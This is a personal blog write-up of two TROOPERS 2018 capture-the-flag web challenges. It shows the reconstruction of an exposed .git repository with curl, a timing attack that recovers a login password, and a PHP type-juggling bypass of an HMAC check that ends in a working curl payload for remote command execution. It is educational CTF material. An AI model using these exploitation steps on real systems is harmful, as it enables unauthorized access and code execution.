Troopers FUCSS CTF 2018 Writeup

On the first of octobre 2018 the TROOPERS Conference tweeted this.

In short, TROOPERS generously give away a couple of free tickets to students that submit a motivational letter. 

This year however, they added an additional technical challenge which features two missions.

Since I'd LOVE to go, I decided to polish my motivational letter with this writeup.

# Table of contents

# How I solved the challenges

# 1. Access Denied

During his development on the custom DBMS and secret investigations, our insider intern figured that the performance issues might have some security impact on the web interfaces authentication as well. Since said entity is rather sloppy with their access controls we found an internet facing web interface. Go over to db.f•••••• and see if you can gain access to the application.

# Reconnaissance

Let's have a look, open the target site.

daniel biegler fucss index

Alright, nothing much to see from the outside.
A very useful thing to check for is the so called robots.txt. This is a convenient standard for telling web robots where to and where not to look. 

Not all robots cooperate with the standard; email harvesters, spambots, malware, and robots that scan for security vulnerabilities may even start with the portions of the website where they have been told to stay out. 

Source:, as of 2018-10-05

For this we just append /robots.txt to the url. 

User-agent: *
Allow: /humans.txt
Disallow: /

User-agent: Evil Imp/3.7
Allow: /login/
Allow: /admin/
Allow: /api/
Disallow: /

Something we can work with, nice. 

While this is the "Robots exclusion standard", there's also an "inclusion standard" called Sitemaps. Those provide web robots with information on where to look for content. Earlier we saw that the robots.txt specifically disallows everything except for the /humans.txt, nontheless, it's always worth looking at the Sitemap. 

daniel biegler fucss 404


So let's take a look at the /humans.txt, the authors maybe dropped a hint there:

this NONSENSE is brought to you by
@hnzlmnn and @talynrae

Well. Maybe a hint, maybe not. /shrug

(either way, give 'em a nice tweet for creating these awesome challenges, will ya?)

Alright, before we continue with the disallowed sites from the robots.txt, let's investigate the root page first.

<!DOCTYPE html>
    <meta charset="utf-8" />
    <meta content="IE=edge" http-equiv="X-UA-Compatible" />
    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <title>FishBowl 0day Database</title>
    <link rel="stylesheet" href="/static/css/main.css" />
  <body class="">
    <div class="grid-wrap main-content">
      <section class="page">
        <div class="page-content">
          <div id="maintenance">
              Maintenance mode has been activated.<br />
              Use the administrative interface to disable it.
    <div class="grid-wrap">
      <header class="site-footer">
        <div class="wrapper">
          <a class="logo" href="/">
          <img alt="LOGO" src="/static/images/logo.svg" />

Very concise, no comments that could help us, no JavaScript either. The only external thing is the CSS file. I won't post it here since it isn't as short as the HTML, but at first glance it doesn't hold any interesting information either - except for these two parts:

#registration-form {
  font-family: "Source Sans Pro", "Helvetica Neue", "Helvetica", sans-serif;
  width: 400px;
  min-width: 250px;
  margin: 20px auto;
  position: relative;
  border-radius: 2px;
  overflow: hidden;
#registration-form:after {

Alright, it seems there is/was a login form somewhere. That doesn't help us as of right now, there could have been something useful here though. Secondly there is this:

body.error {
  background-image: url("/static/images/children-593313.jpg");

body.noaccess {
  background-image: url("/static/images/chain-690088.jpg");

body.notfound {
  background-image: url("/static/images/adult-art-black-and-white-368855.jpg");

body.badrequest {
  background-image: url("/static/images/badrequest.jpg");

This info tells us more about the folder structure of the site. Maybe they misconfigured their server to let us traverse directories?

daniel biegler fucss forbidden

Was worth a try, I guess. The 404 Page doesn't hold anything of value either.

Now we exhausted the useful information inside the initial sites, but remember this:

User-agent: Evil Imp/3.7
Allow: /login/
Allow: /admin/
Allow: /api/
Disallow: /

What's interesting here is the user agent, Evil Imp/3.7, that gets mentioned in the beginning. 

This is your user agent right now:

Websites can use this information to serve you different types of content. Just as a quick example, when your user agent mentions an older browser, sites might try to increase backwards compatibility by using older syntax in the HTM, JavaScript or CSS. 

With this in mind, let's open the disallowed links normally. 

/api leads us to

daniel biegler fucss auth required

/admin redirects us to /login, which looks like this:

daniel biegler fucss login

An interesting detail you'll notice when you type something in is the following:

daniel biegler fucss login format

Sites can request a specific format for input fields via the pattern attribute which, in our case, looks like this:

<input data-error-message="Password required"

In the pattern .{32} the dot . is a wildcard, meaning any character fits, be it a letter, digit or special character. This tells the browser to automatically block passwords that are not exactly 32 characters long. You could, in theory, manually submit passwords that don't fit the pattern - sure. I'll take an educated guess here though and say that this is probably not the intended solution. 

# Time to become Evil

What do those sites look like when we use the aforementioned user agent of Evil Imp/3.7?

In Chrome/Chromium you can change your user agent by opening the Developer Tools (press F12) and switching to the Network Tab. In the three-dot-menu you can find the Network conditions option.

daniel biegler network conditions

This'll let you specify your user agent like so:

daniel biegler network conditions user agent

Back to checking out the site.

The index page /, /api, /admin and /login all return

daniel biegler fucss git gud

Finally! Our first little 'win', as in, our first proper clue!

.git here refers to the popular version control software Git

To summarise quickly for those that are not very familiar with this technology, Git basically helps people and robots keep track of changes to files. It stores information regarding when was which file changed, what was changed, by whom and for what reason.

Figuratively speaking, this information makes attackers salivate.

# Investigate /.git/

Since every page now returns the beautiful Rainbow-Imp-Animation, it's time to remove our custom user agent from earlier.

Problem is that we get greeted by 

daniel biegler fucss forbidden

when we try to access /.git/ because directory traversal was deactivated (remember earlier).

So what happens if we don't want to traverse directories and we target a specific file inside the folder? Since Git got mentioned we can simply look up the internal file structure of Git via their documentation or the man page ( gitrepository-layout ).


   [...] a valid Git repository must have the HEAD file; [...]

Source:, as of 2018-10-05 

So let's simply check via cURL:

ref: refs/heads/master


Non-directory-files don't seem to be forbidden!

Remember that Git can also track why changes were made. One can write about their changes in the so called commit message, which is stored in the COMMIT_EDITMSG file. 


Making your code involuntarily publically accessable can be a big whoopsie, yeah.

# Attack

By getting the individual pieces of the repository we could rebuild it locally and hopefully look up how the authentication at /login works.

So let's create a local repository and fill it with the data from the site.

mkdir repo && cd repo && git init
Initialized empty Git repository in /tmp/repo/.git/

So when we read the HEAD file, that told us that the currently active branch is called 'master'. This in turn enables us to look up the tip-of-the-tree commit objects of said branch.


Now that we know the hash, let's try to get the corresponding object and pretty-print it:

mkdir .git/objects/9a
curl > .git/objects/9a/932cc71e599ab95e588820d1dfeca8cc63313a
git cat-file -p HEAD 
tree 87b769291b90999ec479f93f375cc13f3ed71a08
parent 4388a30f98f830b0baef344d631236feaacfb26f
author devops <> 1525277577 +0200
committer devops <> 1538218054 +0200


There we see the "Whooooopsie" again! We could even write a friendly E-Mail to the commit author. :-)

But more importantly are the tree and parent hashes, those allow us to find more files and commit messages. Let's get the parent.

mkdir .git/objects/9a
curl > .git/objects/43/88a30f98f830b0baef344d631236feaacfb26f
git cat-file -p 4388a30
tree a66997e5f94a288b92c1c53a342ba95cee37edad
author devops <> 1518597252 +0100
committer devops <> 1538218054 +0200

Initial Commit

Hey, this one has no parent! Let's proceed with the first tree then

mkdir .git/objects/87
curl > .git/objects/87/b769291b90999ec479f93f375cc13f3ed71a08
git cat-file -p 87b7692 
100644 blob d5d0d15ef3c8fe414808223edee33f37fd52134e    readme.txt

Here we can see that a readme.txt is stored in that tree. Grab it!

mkdir .git/objects/d5
curl > .git/objects/d5/d0d15ef3c8fe414808223edee33f37fd52134e
git cat-file -p d5d0d15

Migrate codebase into version control system

Nothing interesting in the readme.txt. Next tree.

mkdir .git/objects/a6
curl > .git/objects/a6/6997e5f94a288b92c1c53a342ba95cee37edad
git cat-file -p a66997e
100644 blob d5d0d15ef3c8fe414808223edee33f37fd52134e    readme.txt
100644 blob 9102077ff36290750e5af1551c7a9bad090ec59b    secret.txt

Aaaah, secret.txt sounds interesting.

mkdir .git/objects/91
curl > .git/objects/91/02077ff36290750e5af1551c7a9bad090ec59b
git cat-file -p 9102077
[REST in Pieces]
[Access Denied]
    it's definitely NOT SQLi
    Take your TIME


I guess the hint that it's "NOT" SQL Injection is nice to have.. 

I want to be honest here, I was pretty dissappointed when reading the secret.txt and tried coming up with a new approach for a whole hour. 

With nothing left to see inside the /.git/ folder, I just dabbled with the /login page for a while which looked like this:

daniel biegler fucss login invalid username

I was wondering why it specifically says that the username is invalid instead of something more generic. So naturally I tried to look for a different error message by trying out usernames like:

  • 'root',
  • 'Fishbowl',
  • 'Evil Imp/3.7'

and last but not least:

  • 'admin'.

daniel biegler fucss login username or password wrong

Another puzzle piece found! 

What I so far didn't mention specifically, is that I monitored the response headers of my login-tries to get a better understanding of the whole login-process. Which luckily resulted in me noticing some curious new response from the server! 

Normally the server responds, amongst other things, with these:

X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block

After trying with the 'admin' user, suddenly this new header sneaked in:

X-Content-Type-Options: nosniff
X-DBQuery-Perf: 6ms
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block

Remember the challenge description?

During his development on the custom DBMS and secret investigations, our insider intern figured that the performance issues might have some security impact on the web interfaces authentication as well.

Database Query Performance? 'Take your TIME'?

hangover calculations

Oh my, a Timing Attack!?

By measuring the time it takes the server to process our query, we can guess the correctness of our query! 

Let's say we have a server that validates a passphrase. Said server goes from left to right and needs 1 second per character.

Comparing  'ABCD' and 'ABXD':

daniel biegler variable time string comparison

(I made this graphic myself, do you like it? Let me know!)

Notice how we didn't compare the two 'D' characters? As soon as we see a non-matching character, we stop the comparison. This is problematic.

This allows attackers to estimate the correctness of the provided passphrase by measuring the time. The longer the comparison takes, the better!

This example is pretty drastic because comparing a single character almost never takes a whole second, but don't dismiss this attack. It is a real attack vector which you should look out for, see this paper from the Blackhat Conference in 2015 by Timothy D. Morgan and Jason W. Morgan.

So let's put this theory to the test by doing a couple of requests per character and averaging them afterwards. (I chose to do this in Python with the requests library, more on the specifics later.)

daniel biegler timing attack first letter labeled

Now if that is not suspicious, I don't know what is. Let's try using the found 'S' and appending a second character.

daniel biegler timing attack second letter labeled

It seems like the first character 'S' might be correct, every single response took at least 200ms. It also seems like the second character is '0' (zero).

With these findings, it looks like a correct character adds approximately 200ms response time. If we look for the third character, our worst case time complexity amounts to roughly

400ms per character
* 99 printable ascii characters
+ 600ms for the found character
= 40200ms * n-retries
= 40,2 seconds * n-retries

This is starting to look pretty uncomfortable, especially if you keep in mind that this is only the third character out of 32.

Adding the sequential tries amounts to a worst case of +165 minutes with 1 request per character.

This doesn't sound impossible, but uncomfortable nontheless. We could speed it up by making multiple requests simultaneously, but first let's try to deepen our knowledge of how the comparison works.

What happens if the first character is wrong while the second character is correct? 

daniel biegler timing attack second letter solo labeled

NICE. This means we don't have to include prior found characters, which results in drastically reduced worst case time complexities. Optimistically this results in:

20ms per character
* 99 printable ascii characters
+ 200ms for the found character
= 2.18s * 32 for every character
= 1.16min * n-retries

Only a minute, that's over a 99% time improvement, when compared with the naive bruteforce from before.

Here is my timing attack in action. (video is sped up)

Logging in with 'admin' and our newly found password, we finally reach our goal.


Code used for the timing attack can be found here.

This concludes the first challenge. Take a breather, this has been quite the extensive writeup.

If you enjoyed this you might enjoy my other article about learning binary code interactively.

Anyways, on to the next challenge:

2. REST in Pieces

Our insider intern discovered an unauthenticated API endpoint within the database appliance. Along with this information we were able to exfiltrate a code snippet of this endpoint. You can find it on or pastebin. Locate and examine the endpoint.

This challenge is a little different. Here we are provided with the following code snippet (you don't have to study it completely yet, I'll go over it - step by step):


 * rest.php
 * Remote Execution Service Tomatoâ„¢ 
 * @category   REST
 * @package    Fishbowl 0day DB
 * @author     @hnzlmnn <>
 * @endpoint   /api/vegan/rest
 * @license    MIT
 * @version    1.0


$secret = getenv('secret');
$command = array(
	'algo' => "sha256",
	'nonce' => $_POST['nonce'],
	'hash' => $_POST['hash'],
	'action' => base64_decode($_POST['action'])

if (empty($command['action'])) {

if (!in_array($command['algo'], hash_hmac_algos()) || empty($command['hash'])) {

if (!empty($command['nonce'])) {
	$secret = hash_hmac($command['algo'], $command['nonce'], $secret);

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {


# Reconnaissance

First of all, let's check out the mentioned API endpoint and see what we're dealing with.

daniel biegler fucss tomato get 01

Judging from the code I guess this is supposed to resemble a tomato. Let's send another request.

daniel biegler fucss tomato get 02

Oh, you get different facts about the tomato. Neat.

Inside the response headers we see a juicy status code

Request URL:
Request Method: GET
Status Code: 400 Tomato

Which makes sense if we go through the source. 

$command = array(
	'algo' => "sha256",
	'nonce' => $_POST['nonce'],
	'hash' => $_POST['hash'],
	'action' => base64_decode($_POST['action'])

if (empty($command['action'])) {

If we do not provide an action, we error out with a 400 status code. To verify that we indeed have the proper file, I'd suggest trying to reach the 401 status code. 

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {

For this, we need to check where all the variables, i.e. algo, action, secret and hash, are being set.

$secret = getenv('secret');
$command = array(
	'algo' => "sha256",
	'nonce' => $_POST['nonce'],
	'hash' => $_POST['hash'],
	'action' => base64_decode($_POST['action'])

algo and $secret, are already being set for us. Next down the line is hash which we can blindly set via hash=a, only action needs a little attention. We have to provide a base64 encoded string. Let's encode 'a' for examplary reasons.

printf a | base64

Now we can make a request that should result in a 401 Error.

curl -X POST -i -d 'action=YQ==&hash=a'
HTTP/1.1 401 Tomato
# ...

Works like it's supposed to!

# Planning the attack

Since we have the source code this time, we have the ability to test our exploit on our machine, offline. 

Let's copy the source and spin up a PHP Server.

cp source.php test_exploit.php
php -S

Now let's clean up the file.

Remove the require_once, replace its error methods with our own and provide some useful info.

$secret = getenv('secret');
$command = array(
        'algo' => "sha256",
        'nonce' => $_POST['nonce'], 
        'hash' => $_POST['hash'], 
        'action' => base64_decode($_POST['action']) 

if (empty($command['action'])) {
        echo "1. Error 400: No 'action'!\n";

if (!in_array($command['algo'], hash_hmac_algos()) || empty($command['hash'])) {
        echo "2. Error 400: No 'hash'! \n";

if (!empty($command['nonce'])) {
        echo "You provided 'nonce': ".$command['nonce']."\n";
        $secret = hash_hmac($command['algo'], $command['nonce'], $secret);

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
        echo "3. Error 401: hash_hmac does not match hash! \n";
        echo "  - hmac: ".hash_hmac($command['algo'], $command['action'], $secret)."\n";
        echo "  - hash: ".$command['hash']."\n";
        echo "Exiting now.\n";

// passthru($command['action']);
echo "You got code execution with 'action' being: ".$command['action'];

Here is what an example request looks like now.

curl -X POST -d ""
1. Error 400: No 'action'!
2. Error 400: No 'hash'! 
3. Error 401: hash_hmac does not match hash! 
  - hmac: b613679a0814d9ec772f95d778c35fc5ff1697c493715653c6c712144292c5ad
  - hash: 
Exiting now.

With such clean feedback from ourselves, we can inch forward.

curl -X POST -d "action=YQ==&hash=a" 
3. Error 401: hash_hmac does not match hash! 
  - hmac: 9615a95d4a336118c435b9cd54c5e8644ab956b573aa2926274a1280b6674713
  - hash: a
Exiting now.

But, now comes the third roadblock: We need to know what the result of hash_hmac is.

As an attacker, my mind is always looking for things that I can influence i.e. 'over what parameters do I have what control'. In this case, we already know two out of three parameters.

hash_hmac($command['algo'], $command['action'], $secret)

We know algo and action get set in the beginning:

$command = array(
        'algo' => "sha256",
        // ...
        'action' => base64_decode($_POST['action']) 

Let's see what kind of control we have over $secret. There is a way to influence its value by providing nonce.

if (!empty($command['nonce'])) {
        $secret = hash_hmac($command['algo'], $command['nonce'], $secret);

Again, same thought process. We already know what algo gets set to and $secret is being assigned here:

$secret = getenv('secret');

Sadly this doesn't give us an opportunity to influence its value, though. That leaves only nonce which gets assigned at the top.

$command = array(
        // ..
        'nonce' => $_POST['nonce'], 
        // ..

So we control the raw value of nonce. I emphasize raw here because we are able to set not only the value of nonce, but also - more importantly - its type!

When posting information to a site, you are able to specifiy that the argument is either a "normal", single value or a list of values.

In the latter case, PHP is nice enough to automatically convert a list to an array!

Since PHP is a Loosely Typed language, this can sometimes lead to unexpected behaviour when you don't check the type of the variable you're working with. A very basic example that can bite you in the butt is weak comparisons of strings and numbers.

Strings starting with a number automatically get converted to integers/floats see:

php > var_dump(123 == 123);

php > var_dump(123 == "123");

php > var_dump(123 == "123.0");

php > var_dump(123 == "123example");

php > var_dump(123 == "example123");

So that raises the question: What happens to hash_hmac when we provide an array instead of a string?

php > var_dump(hash_hmac('sha256', array(), "secret"));
PHP Warning:  hash_hmac() expects parameter 2 to be string, array given in php shell code on line 1

PHP is so kind and warns us about the type but does not error out! It just keeps running and returns NULL.

Remember, we're trying to influence the assigned value of $secret, which we now can!

if (!empty($command['nonce'])) {
        $secret = hash_hmac($command['algo'], $command['nonce'], $secret);

When providing a list for nonce, $secret is gonna be NULL!

This in turn, means that we now know all the parameters of the call to hash_hmac here

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
  1. algo has the fixed value "sha256"

  2. action = base64 decoded $_POST['action']

  3. $secret is going to be NULL because we control nonce

  4. hash we control via $_POST['hash']

# Attack

Finally, let's calculate the values we need: action and hash

// action
php > echo base64_encode("id");

And for the hash we can use our PHP Server:

curl -X POST -d "action=aWQ=&hash=a&nonce[]="
You provided 'nonce': Array
3. Error 401: hash_hmac does not match hash! 
  - hmac: 34ce0b031abf5f1f67ab9dfdae781582fdec327df7838c70fcefa9a68e49b909
  - hash: a
Exiting now.

Now we have all the information needed to construct our real payload.

curl -X POST -d "action=aWQ=&hash=34ce0b031abf5f1f67ab9dfdae781582fdec327df7838c70fcefa9a68e49b909&nonce[]="

And there you have it! A flag!

# Closing words

I genuinely enjoyed solving the challenges and creating the writeup. If I could get an invite for the TROOPERS Conference, that would mean the world to me. When I solved the challenges I felt so giddy with excitement, here's my original tweet from way back in octobre.

Please make it happen TROOPERS Team. <3

Thank you all for reading, really do appreciate it.

# Update 2018-12-18

I got invited to TROOPERS!! <3

Thank you so much.

What did you like about this post? Got questions? Get in touch!

( no registration required! )

2 Kommentare

  • What a long and thorough writeup, glad I made it to the end. Cool! Loosely typed languages make me feel itchy!
  • I'm also a fan of knowing my types beforehand, haha. Thanks for reading my post and the kind words, Justin! :)

Was denkst du?

Side note: Comments will appear after being spam filtered, this might take a moment.

Contact me

© Daniel Biegler
Design & implementation by
Daniel Biegler